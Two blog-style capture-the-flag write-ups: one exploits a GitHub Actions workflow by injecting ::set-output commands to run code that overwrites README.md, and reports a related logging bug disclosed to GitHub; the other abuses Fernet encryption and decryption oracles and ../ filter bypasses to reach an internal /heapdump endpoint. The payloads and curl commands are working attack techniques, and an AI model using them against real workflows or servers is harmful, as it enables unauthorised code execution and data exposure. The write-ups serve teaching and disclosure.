The GitHub Capture-the-Flag - Call to Hacktion concluded in March 2021, and I was pleasantly surprised to be the first person to complete the challenge! I intended to write a short writeup on the challenge back then, but the official writeup by GitHub had already explained the vulnerabilities and the solution.

There were some parts which I did not fully understand even after solving the challenge, so I want to take this chance to revisit some of the missed steps. I will also discuss a bug which I chanced upon while performing this deep-dive analysis. Hopefully, this article provides deeper insights into the internals of GitHub Actions, explains the whole exploit chain in detail, and raises awareness about the dangers of logging untrusted inputs in GitHub Actions.

Introduction

Call to Hacktion is a CTF hosted by GitHub Security Lab that ran from 17 March 2021 to 21 March 2021. The challenge is to exploit a vulnerable GitHub Actions workflow in a player-instanced private repository. Contestants are given read-only access to the repository, and the goal is to exploit the vulnerable workflow to overwrite README.md on the main branch, proving that the contestant has successfully obtained write privileges to the repository (i.e. read-only access -> privilege escalation -> read-write access).

Vulnerable Workflow Analysis

Without further ado, let’s jump straight into the vulnerable workflow (.github/workflows/comment-logger.yml) in the player-instanced challenge repository:

name: log and process issue comments
on:
  issue_comment:
    types: [created]

jobs:
  issue_comment:
    name: log issue comment
    runs-on: ubuntu-latest
    steps:
      - id: comment_log
        name: log issue comment
        uses: actions/github-script@v3
        env:
          COMMENT_BODY: ${{ github.event.comment.body }}
          COMMENT_ID: ${{ github.event.comment.id }}
        with:
          github-token: "deadc0de"
          script: |
            console.log(process.env.COMMENT_BODY)
            return process.env.COMMENT_ID
          result-encoding: string
      - id: comment_process
        name: process comment
        uses: actions/github-script@v3
        timeout-minutes: 1
        if: ${{ steps.comment_log.outputs.COMMENT_ID }}
        with:
          script: |
            const id = ${{ steps.comment_log.outputs.COMMENT_ID }}
            return ""
          result-encoding: string

If you have been following GitHub Security Lab’s research articles, you may have come across this article by Jaroslav Lobacevski on code/command injection in workflows. Essentially, it is not recommended to use GitHub Actions expression syntax referencing potentially untrusted input in inline scripts, as this can easily lead to code/command injections. On the line const id = ${{ steps.comment_log.outputs.COMMENT_ID }}, it can be seen that a GitHub Actions expression referencing an output from a previous job step is used directly within the inline script. This looked suspicious, and code injection may be possible if the expression value can be controlled by an adversary.

Let’s move on to examine the referenced job step (comment_log) and determine how code injection could be achieved:

- id: comment_log
  name: log issue comment
  uses: actions/github-script@v3
  env:
    COMMENT_BODY: ${{ github.event.comment.body }}           // attacker-controlled data
    COMMENT_ID: ${{ github.event.comment.id }}               // safe numerical ID generated by GitHub
  with:
    github-token: "deadc0de"
    script: |
      console.log(process.env.COMMENT_BODY)                  // untrusted input logged to standard output!
      return process.env.COMMENT_ID                          // safe value returned
    result-encoding: string
- id: comment_process
  name: process comment
  uses: actions/github-script@v3
  timeout-minutes: 1
  if: ${{ steps.comment_log.outputs.COMMENT_ID }}            // if this output is set from previous job
  with:
    script: |
      const id = ${{ steps.comment_log.outputs.COMMENT_ID }} // fill output value here!
      return ""
    result-encoding: string

Here, the actions/github-script@v3 action is being used. This action accepts a script argument passed using with: in the workflow file and executes it, allowing easy access to the GitHub API and the workflow run context. Notice that the comment body is logged to standard output in the inline script – the attacker-controlled data (comment body) ends up being printed to standard output! Through a feature of GitHub Actions known as workflow commands, actions can interact with the Actions runner: the runner parses the output of each execution step and handles any command denoted by an output line starting with :: after trimming leading whitespace.

This means that when an output line such as ::set-output name=[name]::[value] is being logged, it would be possible to access the output value using ${{ steps.[job_id].outputs.[name] }}. In the vulnerable workflow above, it can be seen that it would be possible for an adversary to set ${{ steps.comment_log.outputs.COMMENT_ID }} such that it leads to a code injection in the comment_process step.
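
To make the mechanics concrete, here is a minimal model of the two behaviours at play – written in Python purely for illustration, not the actual runner code – showing how a logged ::set-output line becomes a step output, and how that output is later substituted verbatim (with no escaping) into the next step’s inline script. The evilCode() payload is just a placeholder:

import re

def collect_outputs(step_stdout):
    # the runner treats any output line starting with '::' (after
    # trimming leading whitespace) as a workflow command
    outputs = {}
    for line in step_stdout.splitlines():
        m = re.match(r'::set-output name=([^:]+)::(.*)', line.lstrip())
        if m:
            outputs[m.group(1)] = m.group(2)
    return outputs

# the attacker's comment body is logged verbatim by console.log()
comment_body = '::set-output name=COMMENT_ID::1; evilCode()'
outputs = collect_outputs(comment_body + '\n')

# comment_process renders its script via plain text substitution,
# producing injected JavaScript
script = 'const id = ' + outputs['COMMENT_ID']
print(script)  # const id = 1; evilCode()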

To solve the challenge, we first terminate the const id = variable assignment with 1; and then inject JavaScript code that uses the pre-authenticated octokit/core.js client to push a new commit overwriting README.md via the GitHub REST API. I ended up with the following solution:

::set-output name=COMMENT_ID::1; console.log(context); console.log(process); await github.request('PUT /repos/{owner}/{repo}/contents/{path}', { owner: 'incrediblysecureinc', repo: 'incredibly-secure-Creastery', path: 'README.md', message: 'Escalated to Read-write Access', content: Buffer.from('Pwned!').toString('base64'), sha: '959c46eb0fbab9ab5b5bfb279ab6d70f720d1207' })

Note: console.log(context); console.log(process); is added purely for debugging and is not actually required to exploit the vulnerable workflow. 959c46eb0fbab9ab5b5bfb279ab6d70f720d1207 refers to the SHA for the git blob (README.md) being updated.

Why Did the Exploit Work?

Now, we have successfully exploited the vulnerable workflow and solved the challenge. But we have yet to understand why it worked under the hood.

Let’s continue by enabling debug logging in the Actions runner. To do so, follow the steps in the documentation and set the following repository secrets:

  • ACTIONS_RUNNER_DEBUG to true
  • ACTIONS_STEP_DEBUG to true

Since participants were given read-only access to the repository, it is not possible to set the secrets in the player-instanced repository. I proceeded to create a private test repository, added the debug repository secrets and imported the vulnerable workflow file.

After supplying a test comment, the workflow runs successfully with the following log:

...
##[debug]Starting: log issue comment
##[debug]Loading inputs
##[debug]Loading env
##[group]Run actions/github-script@v3
with:
  github-token: deadc0de
  script: console.log(process.env.COMMENT_BODY)
  return process.env.COMMENT_ID
  result-encoding: string
  debug: false
  user-agent: actions/github-script
env:
  COMMENT_BODY: Test
  COMMENT_ID: 802762169
##[endgroup]
Test
::set-output name=result::802762169
##[debug]steps.comment_log.outputs.result='802762169'
##[debug]Node Action run completed with exit code 0
##[debug]Finishing: log issue comment
...

It turns out that return process.env.COMMENT_ID does not set ${{ steps.comment_log.outputs.COMMENT_ID }} after all!
In fact, the comment_process step is referencing a supposedly non-existent output from the comment_log step.

However, we do see ${{ steps.comment_log.outputs.result }} being set. Upon examining the source code of actions/github-script@v3, it is clear why this is the case:

...
const result = await callAsyncFunction(
  {require: require, github, context, core, io},
  script
)

...

core.setOutput('result', output)
...

What Could Go Wrong With Logging Untrusted Inputs? :see_no_evil:

One interesting thought I had was: what if the workflow relied on outputs.result instead? Is the modified workflow below vulnerable?

...
    uses: actions/github-script@v3
    script: |
      console.log(process.env.COMMENT_BODY)
      return process.env.COMMENT_ID
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

The answer is no – if the set-output workflow command is executed multiple times for the same output name, only the last value is retained.

Notice that in the above workflow, a trailing newline is enforced implicitly when using console.log().

Now, let’s consider a similar workflow that instead logs untrusted input using process.stdout.write(). Is this vulnerable?

...
    uses: actions/github-script@v3
    script: |
      process.stdout.write(process.env.COMMENT_BODY)         // no trailing newline here
      return process.env.COMMENT_ID                          // does this overwrite existing ::set-output?
    result-encoding: string
...
  - id: comment_process
    name: process comment
    uses: actions/github-script@v3
    timeout-minutes: 1
    if: ${{ steps.comment_log.outputs.result }}              // instead of outputs.COMMENT_ID
    with:
      script: |
        const id = ${{ steps.comment_log.outputs.result }}   // instead of outputs.COMMENT_ID
        return ""
      result-encoding: string

This is a tricky question. I was not sure either, but it turns out this workflow is actually vulnerable!

But why? The Actions Runner reads each line of the step output, then parses and executes any workflow commands (lines starting with the :: marker) it detects. In the above workflow, the output from process.stdout.write(process.env.COMMENT_BODY) is concatenated with the output from core.setOutput('result', output), which is triggered under the hood by the return statement in the inline script.

In other words, if the following comment body is supplied:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
JUNK

Note: There is no trailing newline after JUNK.

The output shown in the job execution logs is:

::set-output name=result::1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);
##[debug]steps.comment_log.outputs.result='1; console.log("This should not be executed -- proof that we indeed have code injection:", 7*191);'
JUNK::set-output name=result::802762169
##[debug]Node Action run completed with exit code 0
...
This should not be executed -- proof that we indeed have code injection: 1337

Observe that the ::set-output workflow command issued for the return value of the script does not enforce a leading newline prior to being concatenated with the logged untrusted input. This means that we can prevent the return statement from successfully setting the result step output by clobbering the ::set-output command with the untrusted input.
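
We can model this clobbering with a few lines of Python (again just a sketch, not the actual runner implementation):

def parsed_commands(step_stdout):
    # the runner only honours commands on lines that *start* with '::'
    return [l for l in step_stdout.splitlines() if l.lstrip().startswith('::')]

untrusted = '::set-output name=result::1; evil()\nJUNK'  # no trailing newline
legit = '::set-output name=result::802762169\n'          # no leading newline either

print(parsed_commands(untrusted + legit))
# ['::set-output name=result::1; evil()']
# the legitimate command is swallowed into the 'JUNK::set-output ...' line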

Examining the source code for @actions/core, we can see why this happens:

export function issueCommand(
  command: string,
  properties: CommandProperties,
  message: any
): void {
  const cmd = new Command(command, properties, message)
  process.stdout.write(cmd.toString() + os.EOL) // leading newline not guaranteed
}

As a result of the missing prepended newline, users who mistakenly trust the output of ${{ steps.*.outputs.result }} set by @actions/github-script through @actions/core may end up working with an untrusted value in subsequent job execution steps, which may lead to remote code/command execution and privilege escalation in seemingly secure workflows.

This issue was reported to GitHub via HackerOne and was resolved through the release of an interim solution that prepends a newline in all calls to core.setOutput():

  • @actions/core v1.2.7 [PR]
  • actions/github-script v4.0.2 [PR]

Admittedly, while the interim solution is necessary, it is far from perfect as workflows/actions using core.setOutput() under the hood may cause a lot of unnecessary newlines to appear in the job execution logs. In the future, this issue may be properly addressed with the complete removal of standard output command processing:

“To address the wider risks you bring up more holistically, we’re planning on removing stdout command processing altogether in favor of a true CLI interface you’d need to explicitly choose to invoke to perform workflow commands. So long as info written to stdout can influence the runtime of an action, it’s no longer safe to print untrusted data to logs (and that’s certainly not a reasonable expectation to set for users of Actions). We may make some of this behavior more strict in the meantime, but long term we’re planning on tearing it out.”

Disclosure Timeline

  • March 23, 2021 – Reported to GitHub Bug Bounty program on HackerOne
  • March 24, 2021 – GitHub – Initial acknowledgement of report
  • April 12, 2021 – Enquired on the status of the report
  • April 12, 2021 – GitHub – Provided update that their engineering teams are still working on triaging this issue
  • April 17, 2021 – GitHub – Asked to review the pull request on @actions/toolkit to implement the interim fix prior to removal of standard output processing of set-output, and informed about long term plan to remove support for standard output processing
  • April 18, 2021 – Verified interim fix in @actions/core is correct, but noted that the dependency of actions/github-script was not updated accordingly. Agreed that deprecating standard output command processing is a good move to eliminate such unexpected vulnerabilities caused by logging untrusted inputs.
  • June 19, 2021 – GitHub – Resolved report and awarded bounty

Conclusion

In the past, there had been security concerns over workflow commands being parsed and executed by the Actions runner, which led to unexpected modification of environment variables and path injection, resulting in remote code/command execution in workflows. To mitigate such risks, the GitHub team decided to deprecate several workflow commands. It is strongly recommended to disable workflow command processing prior to logging any untrusted input to avoid any unexpected behaviour!
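
For example, a step that must log untrusted data can suspend command processing around it using the documented stop-commands workflow command. A minimal sketch in Python (the helper name and random token are my own):

import secrets
import sys

def log_untrusted(data):
    # suspend workflow command processing; the runner resumes only
    # when it sees the same random token again
    token = secrets.token_hex(16)
    sys.stdout.write('::stop-commands::' + token + '\n')
    sys.stdout.write(data + '\n')
    sys.stdout.write('::' + token + '::\n')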

Thanks to the GitHub Security Lab team for creating this awesome challenge and for the bounty! Taking part in this challenge helped immensely in solidifying my understanding of GitHub Actions and the security considerations one should make when creating workflows.

Recently, BugPoC teamed up with @NahamSec and announced a memory leak challenge sponsored by Amazon on Twitter. The vulnerabilities presented in the challenge are rather realistic – in fact, I have encountered such vulnerabilities a couple of times while bug hunting on web applications! Besides presenting a walkthrough of the challenge in this write-up, I will also discuss alternative solutions and include some tips. Do read on if you are interested! :smile:

Introduction

The goal of the challenge is to find an insecurely stored Python variable called SECRET_API_KEY somewhere on the server – http://doggo.buggywebsite.com.

Let’s start by finding out more information about the challenge site provided.

$ dig doggo.buggywebsite.com +short any
doggo.buggywebsite.com.s3-website-us-west-2.amazonaws.com

It seems to be an Amazon S3 website. If the S3 bucket is misconfigured, we could possibly discover new information stored in the bucket, or even mess around with the files in it. You can use a tool such as BucketScanner by @Rzepsky to check for common S3 bucket misconfigurations. Unfortunately, this bucket is not misconfigured, so let’s go back to the challenge site itself.
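
For reference, a quick anonymous listing check can also be done with boto3 (a sketch; the bucket name is inferred from the dig output above):

import boto3
from botocore import UNSIGNED
from botocore.config import Config

# unauthenticated client, mimicking an anonymous visitor
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED), region_name='us-west-2')
try:
    resp = s3.list_objects_v2(Bucket='doggo.buggywebsite.com')
    print([obj['Key'] for obj in resp.get('Contents', [])])
except Exception as e:
    print('listing denied:', e)  # bucket listing is locked down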

Visiting the challenge site at http://doggo.buggywebsite.com/, we can see a few images of dogs. Let’s examine the JavaScript file loaded (script.js) to better understand how the images are fetched dynamically:

const API_ENDPOINT = "https://doggo-api.buggywebsite.com";

async function getURLs(pageNum){
  var PARAMS = {
    1: "gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==",
    2: "gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==",
    3: "gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==",
    4: "gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ=="
  };
  var param = PARAMS[pageNum];
  var endpoint = API_ENDPOINT + '/get-dogs';

  let response = await fetch(endpoint, {
    headers: {
      'x-param': param,
      'x-fingerprint': localStorage.fingerprint,
    }
  });
  let data = await response.json()
  return data['body'];

}

function addImages(urls){
  var div = document.getElementById('images-div');
  div.innerHTML = '';
  for (var i = 0; i < urls.length; i++){
    var img = document.createElement('img');
    img.setAttribute('class', 'pretty-img');
    img.setAttribute('src', urls[i]);
    div.appendChild(img)
    div.appendChild(document.createElement('br'))
  }
}

function loadPage(pageNum){
  document.querySelector('#theLoader').style.display='inline';
  var buttons = document.getElementsByClassName('page-button');
  for (var i = 0; i < buttons.length; i++){
    buttons[i].disabled = false;
  }
  getURLs(pageNum).then(urls => {
    addImages(JSON.parse(urls));
    document.getElementById('button-'+pageNum).disabled = true;
    document.querySelector('#theLoader').style.display='none';
  })
}

async function setFingerprint(){
  if (localStorage.fingerprint == undefined) {
    document.querySelector('#theLoader').style.display='inline';
    var endpoint = API_ENDPOINT + '/fingerprint';
    let response = await fetch(endpoint);
    let data = await response.json()
    localStorage.fingerprint = data['fingerprint'];
  }
}

function initPage(){
  setFingerprint().then(_ => {
    loadPage(1);
  })
}

It seems that there is an API server at https://doggo-api.buggywebsite.com. This API server should be the actual target, since the goal is to achieve some form of memory leakage, which we can’t really achieve on http://doggo.buggywebsite.com (a static website hosted on an S3 bucket).

Two endpoints can also be observed from the JavaScript code, namely:

  • /get-dogs – an endpoint accepting an encrypted x-param header value and loading different pages of dogs
  • /fingerprint – an endpoint used to obtain some value for fingerprinting the current user.

You may have also noticed that there are four Base64-encoded strings starting with gAAAAAB. Decoding them yields binary data, indicating that the values may have been encrypted prior to being encoded. A quick search on this prefix reveals that this is likely Fernet, a symmetric encryption module commonly used in building Python applications.
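
For illustration, every Fernet token starts with the version byte 0x80 followed by a timestamp, which is why its URL-safe Base64 form always begins with gAAAAA. A sketch using the cryptography package (the key and plaintext here are made up):

from cryptography.fernet import Fernet

key = Fernet.generate_key()                   # random key, made up for the demo
token = Fernet(key).encrypt(b'/dogs?page=1')  # plaintext is only a guess
print(token[:6])  # b'gAAAAA' -- version byte 0x80 plus the timestamp prefix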

Since we do not know the secret key used to create the ciphertexts, we cannot decrypt them ourselves. There aren’t any relevant known weaknesses in Fernet that allow us to encrypt/decrypt arbitrary text either, so let’s keep this information in mind and move on to examine the other information we just gathered.

/get-dogs Endpoint

Tracing the JavaScript code, we can see that whenever a page is requested, a fingerprint value is first obtained from /fingerprint, followed by a request to the /get-dogs endpoint with the respective Base64-encoded encrypted value to fetch the list of images to load.

Let’s try to replicate this behaviour to better understand the application flow. We start by obtaining a valid fingerprint value:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Then, we attempt to request the dog images for all four Base-64 encoded strings we discovered earlier on.

$ echo 'gAAAAABgGg49vp03MkS2gsuz1SLZat7_z36Nkc4I-25X4-RtxXd_pxv964ObmIgunslqWO47kWxCWUSdZVCSlgqGnTi7ekqEaA==' > 1.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 1.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=1", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog1.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog2.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog3.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog4.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog5.jpg\"]"}

$ echo 'gAAAAABgGg5OwIOIQGgUJSF_iuwDa8XcB8im0v3l7S-cwZgkufRFsfb5EL4Dawc3ZA_xwyG8BkbIkMnFrl6ACVGzmd_9adDMfA==' > 2.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 2.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=2", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog6.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog7.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog8.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog9.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog10.jpg\"]"}

$ echo 'gAAAAABgGg5dGZ3R5ZHcBV3A4L2QM3-LMxsmbLFTSXWmBiXTa9BgAN8ZhmDQDONVaf7VT_s1CMK-uL8huNQy1wwfQovk1t7Jfw==' > 3.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 3.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=3", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog11.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog12.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog13.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog14.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog15.jpg\"]"}

$ echo 'gAAAAABgGg5u4W_yBC5YgusPCtmKOtxQYAgo161YK_Njo67ZLo6fGm6nyKwRIQ8divqkUL2mymw2fxeKF_BenpqSo79KuMj6JQ==' > 4.b64
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat 4.b64)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs?page=4", "statusCode": 200, "body": "[\"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog16.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog17.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog18.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog19.jpg\", \"https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog20.jpg\"]"}

Notice that the paths in the responses are largely similar. From the above testing, we can infer that the encrypted value likely contains /dogs?page=1, or perhaps simply ?page=1. Besides that, we also made two new discoveries:

  1. We now know that there is yet another endpoint on this API server – /dogs
  2. We found another S3 bucket at buggy-dog-pics.s3-us-west-2.amazonaws.com (spoiler: nothing much here, really :joy:)

Internal Endpoints

Let’s try to access the /dogs endpoint directly:

$ curl https://doggo-api.buggywebsite.com/dogs
Error, this endpoint is only internally accessible

It seems like this endpoint is accessible via the internal network only. It’s worth noting that we could fiddle around with headers such as X-Forwarded-For: 127.0.0.1 to trick the application into thinking that we are making the request from an internal network, but in this case the server isn’t vulnerable to such attacks.

Let’s move on to fuzz for other endpoints and see what we can do with them:

$ ffuf -u 'https://doggo-api.buggywebsite.com/FUZZ' -w ./SecLists/Discovery/Web-Content/quickhits.txt

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1
________________________________________________

 :: Method           : GET
 :: URL              : https://doggo-api.buggywebsite.com/FUZZ
 :: Wordlist         : FUZZ: ./SecLists/Discovery/Web-Content/quickhits.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

/heapdump               [Status: 401, Size: 50, Words: 7, Lines: 1]

Looks suspicious. Let’s check the response of the /heapdump endpoint:

$ curl https://doggo-api.buggywebsite.com/heapdump
Error, this endpoint is only internally accessible

We discovered another internal endpoint! But now what? What else can we do? :thinking:

Encryption & Decryption Oracles

Recall that earlier, we had to generate a fingerprint before using the /get-dogs endpoint to fetch the respective page of dog images. Let’s take a closer look at the endpoint request and response again carefully:

$ curl -s -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkm96w1MoKBnTslSzxiHX3VgcK-9j5ETD41Z0Q7zUm-gMCkNUdrJdg10n6l0SKxtmos5CrN4kkYACudYKcx_OGW3eezJ6ScQ3DHx_Sxr9kMavb5NTDKDO57iQPxNwu3DJGw_Sh1uok3McF-rEjTwd9ybzDbWfyFYYS9Ka-Gq6uAzHiNl9Z9sujy5XFUBoAcmEfoatp_Tl3LHCBv7Dbn0Et5YqPe5gxbRlDkvjqyw73nOJD7k=

Notice that the fingerprint returned in the JSON response starts with gAAAAAB too, indicating that the string may very well be a ciphertext produced using Fernet! What if we supply this fingerprint value as the x-param header value instead of one of the four pre-defined Base64 strings?

$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Interesting! It looks like we were able to successfully decrypt the fingerprint value. This indicates that the encryption key used for generating the four hardcoded Base64 strings in the JavaScript file is the same one used for generating the encrypted fingerprint value.

We can infer the following from the above output:

  • The fingerprint contains a serialised JSON object: {"UA": request.headers["User-Agent"]}.
  • The /get-dogs endpoint creates a URL to be fetched on the server-side by concatenating the protocol (e.g. http://), backend host (e.g. localhost), port (e.g. 80), the string /dogs, and the decrypted x-param header value. In other words, the server-side request URL is formed as: 'http://localhost:80/dogs' + decrypt(request.headers['x-param']).

In addition, we now know that we have an encryption oracle (via the /fingerprint endpoint with a custom User-Agent header value) and a decryption oracle (via the /get-dogs endpoint with a custom x-param header value containing the ciphertext). These provide us with powerful primitives – we can create valid ciphertexts for chosen plaintexts (albeit with some data prepended/appended due to the JSON serialisation) and use the generated ciphertexts to tamper with the request path in the server-side request!
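
To make the two oracles convenient to work with, we can wrap them in small helpers (a sketch using the requests library, with the header names and endpoints observed above):

import requests

API = 'https://doggo-api.buggywebsite.com'

def encrypt(plaintext):
    # encryption oracle: /fingerprint encrypts {"UA": <User-Agent>}
    r = requests.get(API + '/fingerprint', headers={'User-Agent': plaintext})
    return r.json()['fingerprint']

def decrypt_and_fetch(token):
    # decryption oracle: /get-dogs appends decrypt(x-param) to '/dogs'
    # and echoes the resulting path back in the response
    r = requests.get(API + '/get-dogs', headers={'x-param': token, 'x-fingerprint': token})
    return r.json()

print(decrypt_and_fetch(encrypt('TEST'))['path'])  # /dogs{"UA": "TEST"}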

Getting to the /heapdump

Let’s take a closer look at how we can tamper with the request path:

$ curl -s -H 'User-Agent: TEST' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgku7UVOl_To_pUd7J1qzYfOJvbEhVqpa_7DN_7m5YZI0np1jfXoVzWSRROrWQy4bxWuYylza3pUMZffRv5DZ2DPQZsA==
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"TEST\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

Since we can’t modify the prepended /dogs string, the server-side request will always use a path beginning with /dogs. What we can do is perform a path traversal attack to access another endpoint besides /dogs, as such:

  • Set User-Agent header value to /../heapdump#
  • This results in the requested URL being something like: http://localhost/dogs{"UA": "/../heapdump#"}, which may be normalised by the webserver to: http://localhost/heapdump.

Note: Since the hash fragment is not actually part of the resource path, it (usually) isn’t sent to the server. Most webservers also ignore the hash fragment, so we can effectively get rid of the trailing "} produced by the JSON serialisation. You could also use ? to force the trailing "} to be treated as a query string parameter, but some applications may not like that :)
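
As a rough model of the normalisation described above (using posixpath.normpath as a stand-in for the webserver’s behaviour; real servers differ in the details):

import posixpath
from urllib.parse import urldefrag

url = 'http://localhost/dogs{"UA": "/../heapdump#"}'
url, _fragment = urldefrag(url)        # the '"}' after '#' never reaches the server
path = url[len('http://localhost'):]   # '/dogs{"UA": "/../heapdump'
print(posixpath.normpath(path))        # '/heapdump'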

Let’s try out the attack idea:

$ curl -s -H 'User-Agent: /../heapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvSr7zNtRXxDO14Y37625vSYXQ9Ma8YwdxnEuWyV9cxCVzprPIl60ped_DSlpq2l2QKuAXbbSvRu479zVF97tMj4A-W8IEu5I6qpruHDf2w8Bm8
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
{"path": "/dogs{\"UA\": \"/heapdump#\"}", "statusCode": 404, "body": "{\"message\":\"Not Found\"}"}

It seems like ../ is being stripped from the request path. There are actually two bypasses for this.

The first solution works because ../ is only stripped once globally and not recursively: supplying ..././ ends up as ../ after stripping, which is exactly what we want!
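
Python’s str.replace() behaves the same way – a single left-to-right pass over non-overlapping matches with no rescanning – so the bypass is easy to demonstrate:

payload = '..././heapdump'
print(payload.replace('../', ''))  # '../heapdump' -- the traversal survives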

The second solution is to use URL-encoded path traversal payloads such as ..%2f, .%2e/ or %2e%2e%2f instead of ../. This works because most webservers URL-decode the request path before routing it to the application. We can easily verify that this behaviour exists:

$ curl https://doggo-api.buggywebsite.com/fingerprint/..%2fdogs
Error, this endpoint is only internally accessible

Clearly, we ended up being routed to the internal /dogs endpoint instead of the publicly-accessible /fingerprint endpoint, proving that this approach indeed works.

Now, let’s go get the flag!

$ curl -s -H 'User-Agent: /..%2fheapdump#' https://doggo-api.buggywebsite.com/fingerprint | jq -r .fingerprint | tee fingerprint.txt
gAAAAABgkvWY5SmGJUpySKZn2AjGP27q41C6DKljy3Xkg08fQZfvnvSCbAse2k_Dmx_JaVKN-QaOzgSQq2Nz_pIpDTUYMdhbdd_kjH9q1d1llgnKoECvB7o=
$ curl -H "x-fingerprint: $(cat fingerprint.txt)" -H "x-param: $(cat fingerprint.txt)" https://doggo-api.buggywebsite.com/get-dogs
